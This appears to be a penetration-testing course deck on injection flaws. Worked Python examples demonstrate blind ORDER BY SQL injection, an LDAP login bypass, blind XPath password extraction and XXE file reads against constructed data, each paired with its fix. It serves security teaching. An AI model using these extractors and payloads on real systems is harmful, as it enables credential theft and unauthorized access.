The Art Of Exploiting
Injection Flaws
Sumit Siddharth
sid@notsosecure.com
About the course
 Hands-on, 2-day training
 Requires out-of-the-box thinking (strong coffee recommended!)
 20 exercises, 100 slides, 8 CTFs!
 Previous feedback:
 “This was the best course I have ever been on. Since attending the course, I have identified so many issues which automated tools have missed. Thanks a ton, Sid”
 “I have been pentesting for 4 years now, and thought I knew all about SQLI. I guess I was wrong. If anyone knows this subject well, it is Sid”
About Me
Sumit “sid” Siddharth
 Speaker/Trainer at Black Hat, DEF CON, OWASP AppSec, HITB, Ruxcon, etc.
 My blog: www.notsosecure.com
 Specialist in Application & Database Security!
 More than 8 years of Pentesting!
 Co-author: SQL Injection Attacks and Defense
 Head of Penetration Testing at 7Safe
Day 1: SQL Injection
Exploiting SQL Injections
 Authentication Bypass
 Extracting Data
 Error Message Enabled
 Error Message Disabled
 Union Injection
 Blind Injection
 Time Delays
 Out Of Band Channels
 Privilege Escalation
 OS code execution
Exercise 9.8 – SQL Injection: OS command execution
 http://hacklab.net/hackme_7.5/
 Objective
 Exploit SQL injection to run OS commands on the database server
 CTF: What are the contents of C:\secret.txt on the server?
 Time
 10 mins
Advanced SQL Injection
 Insanely Blind SQL Injection
 Application returns the same response whatever the input
 Injection point is inside an INSERT/UPDATE statement
Encoding/Decoding User Input
 Base64 decoding user input
 Hex decoding user input
 Real world examples
 WordPress Admin-Ajax.php unauthenticated SQL injection
 PHP-Nuke auth.php (excerpt as shown on the slide):
// the admin cookie is base64-decoded before it is used, so any filter that
// inspects the raw request never sees the SQL inside it
$cookie = explode(';', urldecode(empty($_POST['cookie'])))
$admin = base64_decode($admin)
SQL Injection in SQL Names
 Consider the following (classic ASP):
Dim cat, orderBy, query
' quotes are doubled, which is how MS SQL escapes a string literal
cat = Replace(Request.Form("cat"), "'", "''")
orderBy = Replace(Request.Form("orderBy"), "'", "''")
' cat is placed inside quotes, but orderBy is concatenated bare: a column
' name or expression needs no quote at all, so the doubling does nothing there
query = "SELECT * FROM prod WHERE cat = '" & cat & "' ORDER BY " & orderBy
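The ORDER BY problem above, worked through as an added example (my code, not the course's): a Python/sqlite3 port of the ASP query, a blind oracle that needs no quote character at all, and the hardened form. The table contents, the admin secret and the allow-list are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not from the course): the prod table the
    slide's query reads, plus a users table holding a secret to recover."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE prod (id INTEGER, name TEXT, cat TEXT, price REAL);
        INSERT INTO prod VALUES (1, 'zebra mug', 'gifts', 3.50),
                                (2, 'apple pen', 'gifts', 12.00),
                                (3, 'mouse mat', 'office', 7.25);
        CREATE TABLE users (name TEXT, pw TEXT);
        INSERT INTO users VALUES ('admin', 'Sup3r!');
    """)
    return db


def search_vulnerable(db: sqlite3.Connection, cat: str, order_by: str) -> list:
    """Port of the slide's ASP code: both inputs get their quotes doubled,
    then cat is placed inside quotes and orderBy is concatenated bare."""
    cat = cat.replace("'", "''")
    order_by = order_by.replace("'", "''")
    query = f"SELECT * FROM prod WHERE cat = '{cat}' ORDER BY {order_by}"
    return db.execute(query).fetchall()


def oracle(db: sqlite3.Connection, condition: str) -> bool:
    """One boolean question per request. The CASE expression sorts by id when
    the condition holds and by -id otherwise, so the first row's id answers
    the question. The payload contains no quote, so the doubling never fires."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE -id END)"
    rows = search_vulnerable(db, "gifts", payload)
    return rows[0][0] == 1


def extract_admin_password(db: sqlite3.Connection) -> str:
    """Blind extraction through ORDER BY: length first, then one character at
    a time; unicode(substr(...)) keeps the comparison numeric, no quotes."""
    target = "(SELECT pw FROM users LIMIT 1)"
    length = next(n for n in range(1, 65) if oracle(db, f"length({target}) = {n}"))
    recovered = ""
    for pos in range(1, length + 1):
        code = next(c for c in range(32, 127)
                    if oracle(db, f"unicode(substr({target}, {pos}, 1)) = {c}"))
        recovered += chr(code)
    return recovered


ALLOWED_SORT_COLUMNS = {"id", "name", "price"}  # assumed allow-list for the fix


def search_safe(db: sqlite3.Connection, cat: str, order_by: str) -> list:
    """Hardened version: the string travels as a bind parameter and the
    identifier is checked against an allow-list, because a column name
    cannot be bound as a parameter."""
    if order_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    return db.execute(
        f"SELECT * FROM prod WHERE cat = ? ORDER BY {order_by}", (cat,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("recovered through ORDER BY:", extract_admin_password(conn))
```

The doubling is sound for cat (a payload such as gifts' OR 1=1 -- simply matches no category), but orderBy is an identifier position: a CASE expression with no quote character at all flips the sort order and leaks one bit per request. Identifiers cannot be parameterised, so the only fix is to validate them against an allow-list.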
Hacking Oracle from Web
 Exploiting SQL Injection against Oracle databases
 How to extract data
 One query to get them all!
 How to execute OS code
 What if we are not DBA?
 Become DBA
 Execute OS code
 Drop DBA
Capture The Flag: SQL Injection
 http://hacklab.net/ctf.asp?data=foobar
 Objective
 What’s in C:\secret.txt?
 Time
 20 Mins!
 No instructions or hints this time!
Day 2: The Art of Exploiting
Lesser Known Injection Flaws
ORM Injection
LDAP Injection
Advanced LDAP Injection
XPath Injection
Xpath v2
XML Entity Injection
Combining Xpath and XXE
CTF
Q&A
Hibernate Query Language Injection
 User input concatenated into the HQL string reaches the underlying SQL engine:
// param is untrusted user input; HQL is built by string concatenation
List<Event> result = session.createQuery(
        "from Event e where e.title='" + param + "'").list();
HACKING LDAP
LDAP overview
LDAP injection
Blind LDAP injection
Hacking LDAP in practice
Securing Applications Against LDAP Injections
LDAP Injection: Authentication Bypass
 (&(user=username)(password=pwd))
 Usually the password is hashed and then matched against the stored value
 Injection is therefore most likely to work only in the username field
 (&(user=username)(password=*)) – the wildcard only helps when the password is not hashed
 (&(user=username)(&))(password=pwd)) – username "username)(&)" injected; (&) is the always-true filter
Anything after the first complete filter is ignored by OpenLDAP, so the password check becomes a trailing remnant
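Added example, not part of the course material: a small RFC 4515 filter parser and matcher over a constructed two-entry directory, used to show why the username payload works and why the password wildcard stops working once passwords are hashed. The parser consumes one complete filter and discards the rest, mirroring the OpenLDAP behaviour the slide describes; the sha256 hashing, entry names and passwords are assumptions for the example.

```python
import hashlib
import re


def _h(pw: str) -> str:
    # assumed storage format: hex sha256 of the password (constructed)
    return hashlib.sha256(pw.encode()).hexdigest()


# Constructed directory (not from the course); passwords stored hashed
DIRECTORY = [
    {"user": "admin", "password": _h("letmein")},
    {"user": "eric", "password": _h("philip")},
]


def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping for a value placed inside a search filter."""
    return "".join(f"\\{ord(c):02x}" if c in "*()\\\x00" else c for c in value)


def build_login_filter(user: str, password: str, escape: bool) -> str:
    if escape:
        user, password = escape_filter_value(user), escape_filter_value(password)
    return f"(&(user={user})(password={password}))"


class FilterParser:
    """Minimal RFC 4515 parser: consumes one complete filter and returns it
    together with whatever text is left over. The caller ignores the
    left-over, which is the behaviour the slide attributes to OpenLDAP."""

    def __init__(self, text: str):
        self.s, self.i = text, 0

    def parse(self):
        node = self._filter()
        return node, self.s[self.i:]

    def _filter(self):
        self._expect("(")
        c = self.s[self.i]
        if c in "&|":  # (&) with no sub-filters is the absolute-true filter
            self.i += 1
            subs = []
            while self.s[self.i] != ")":
                subs.append(self._filter())
            self.i += 1
            return (c, subs)
        if c == "!":
            self.i += 1
            sub = self._filter()
            self._expect(")")
            return ("!", [sub])
        end = self.s.index(")", self.i)  # a ')' inside a value must be escaped as \29
        attr, _, raw = self.s[self.i:end].partition("=")
        self.i = end + 1
        return ("=", attr, raw)

    def _expect(self, ch: str) -> None:
        if self.s[self.i] != ch:
            raise ValueError(f"expected {ch!r} at offset {self.i}")
        self.i += 1


def _value_pattern(raw: str):
    """Unescaped '*' is a wildcard; '\\XX' sequences are literal characters."""
    pieces = []
    for piece in raw.split("*"):
        literal = re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), piece)
        pieces.append(re.escape(literal))
    return re.compile(".*".join(pieces), re.DOTALL)


def matches(node, entry: dict) -> bool:
    kind = node[0]
    if kind == "&":
        return all(matches(n, entry) for n in node[1])  # all([]) is True
    if kind == "|":
        return any(matches(n, entry) for n in node[1])  # any([]) is False
    if kind == "!":
        return not matches(node[1][0], entry)
    value = entry.get(node[1])
    return value is not None and _value_pattern(node[2]).fullmatch(value) is not None


def authenticate(user: str, password: str, escape: bool, hash_password: bool = True) -> list:
    """Users matched by the login filter: escape=False is the vulnerable
    application, escape=True the hardened one."""
    if hash_password:
        password = _h(password)
    node, _trailing = FilterParser(build_login_filter(user, password, escape)).parse()
    return [e["user"] for e in DIRECTORY if matches(node, e)]


if __name__ == "__main__":
    print(build_login_filter("admin)(&)", "x", escape=False))
    print(authenticate("admin)(&)", "wrong", escape=False))
```

With the username admin)(&) the unescaped filter becomes (&(user=admin)(&))(password=…)); the parser stops after the first balanced filter, which is satisfied by the admin entry regardless of password. Escaping turns the same input into admin\29\28&\29, a literal that matches nobody. A bare * in the password field only works when the application compares the plaintext, which the slide notes is rare.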
Exercise 6
 http://hacklab2.net:81/ldap/selfservice/
 PHP/LDAP
 Find the telephone number of employee Eric Philip
 Time: 10 mins
XPATH Injection
 Agenda
 What is XPATH
 Exploiting XPATH
 Impact of XPATH exploitation
 Blind XPATH Injection
 Automating XPATH Injection
 XPATH v2 injection
 Insane XPATH Injection
 Defending against XPATH Injection
XPATH’s XML Nomenclature
 (diagram: a sample XML document annotated with root node, node, node name, node value, attribute name, attribute value and comment)
Automating Xpath
 XPATH Explorer
 Demo time!
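Added example (my code, not the course's XPath Explorer) of what such automation does, assuming lxml is installed: a login query built by concatenation, the boolean oracle an attacker gets from it, character-by-character recovery of a secret with string-length() and substring(), and the hardened query using XPath variables. The user store and its passwords are constructed for the example.

```python
from lxml import etree

# Constructed user store (not from the course)
USERS_XML = b"""<users>
  <user><name>alice</name><password>wonder</password><role>user</role></user>
  <user><name>admin</name><password>Xp4th!</password><role>admin</role></user>
</users>"""
DOC = etree.fromstring(USERS_XML)


def login_vulnerable(name: str, password: str) -> list:
    """XPath built by string concatenation, the pattern the course exploits."""
    return DOC.xpath(f"//user[name='{name}' and password='{password}']/role/text()")


def login_safe(name: str, password: str) -> list:
    """Hardened: XPath variables, so input is data and never query syntax."""
    return DOC.xpath("//user[name=$n and password=$p]/role/text()", n=name, p=password)


def oracle(condition: str) -> bool:
    """All the attacker observes is whether login succeeded (non-empty result).
    'and' binds tighter than 'or', so the predicate collapses to `condition`
    for every user node and the password check becomes irrelevant."""
    payload = f"zzz' or ({condition}) or 'a'='b"
    return len(login_vulnerable(payload, "x")) > 0


# no single quote in the charset, since that would break the injected literal
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_=+"


def extract_admin_password() -> str:
    """Blind XPath injection: learn the length, then each character."""
    target = "//user[name='admin']/password"
    length = next(n for n in range(1, 65) if oracle(f"string-length({target})={n}"))
    return "".join(
        next(c for c in CHARSET if oracle(f"substring({target},{i},1)='{c}'"))
        for i in range(1, length + 1)
    )


if __name__ == "__main__":
    print("admin password recovered blind:", extract_admin_password())
```

Each character costs at most len(CHARSET) requests here; the XPath 2.0 functions listed on the next slide (codepoints, regular expressions) are what let tools cut that key space down.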
XPath 2.0 Features
 Hugely increased feature set
 Regular expressions
 Unicode normalization
 String to code point conversion
 Remote document references
 All of these can be utilised to speed up document retrieval and reduce the key space we have to search.
XPATH 2.0
 Allows reading not just the current XML file but any arbitrary XML file on the file system (through the doc() function)
Hacking Web Services with XML External Entity
 The XML is not validated before it is processed
 The attacker injects an external entity:
 <!ENTITY pwned SYSTEM "file:///c:/boot.ini" >
 The web service parses the entity and the parser accesses the local resource
 Unauthorized access to information
 Port scanning
 Denial of service attack
 Breaking the XML syntax
 Providing files like /dev/urandom
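The entity trick above as an added example against Python's standard-library xml.sax parser (my code, not the course's): the same payload parsed with external general entities enabled, which returns the target file's contents, and with them disabled (the default since Python 3.7.1), which leaves the entity empty. The temporary secret file and the order document format are constructed for the example.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects every piece of character data the parser reports, including
    text that came from an expanded entity."""

    def __init__(self):
        super().__init__()
        self.text = ""

    def characters(self, content):
        self.text += content


def parse_order(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """resolve_external_entities=True is the vulnerable configuration: the
    parser fetches whatever SYSTEM identifier the document names. With it
    False the entity reference expands to nothing."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


def xxe_payload(system_id: str) -> bytes:
    """The slide's <!ENTITY pwned SYSTEM ...> declaration wrapped in the
    document a hypothetical order web service expects (constructed)."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE order [\n"
        f'  <!ENTITY pwned SYSTEM "{system_id}">\n'
        "]>\n"
        "<order><item>&pwned;</item></order>"
    ).encode()


def demo() -> tuple:
    """Writes a constructed secret file, then parses the same payload with
    the vulnerable and the hardened parser. Returns (leaked, blocked)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("flag{constructed-secret}")
        path = fh.name
    try:
        payload = xxe_payload("file://" + path)
        leaked = parse_order(payload, resolve_external_entities=True)
        blocked = parse_order(payload, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, blocked


if __name__ == "__main__":
    print(demo())
```

The hardened call is a one-line feature flag here; in a real service, also reject any document that carries a DOCTYPE at all, which closes the denial-of-service variants on the slide (/dev/urandom, entity expansion) as well.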
Combining XXE and Xpath
 Did I say that with XPath 2.0 you can read arbitrary XML files on the file system?
 I actually meant:
 with XPath 2.0 you can read arbitrary XML files on the file system.
 Introducing Xcat
Thank You!
 Questions please...
 Sid@notsosecure.com
 Twitter: notsosecure


Editor's Notes

  • #9 Is the following exercise ready? Not sure what it has to do with this slide. Exercise: SQL Injection in cookies
  • #10 MS-SQL escapes quotes by doubling them. What's the problem? The ORDER BY part does not require a string to be vulnerable.
  • #15 Run through Instructor Introduction first, having: changed the name on slide 2; ensured the correct instructor slide is unhidden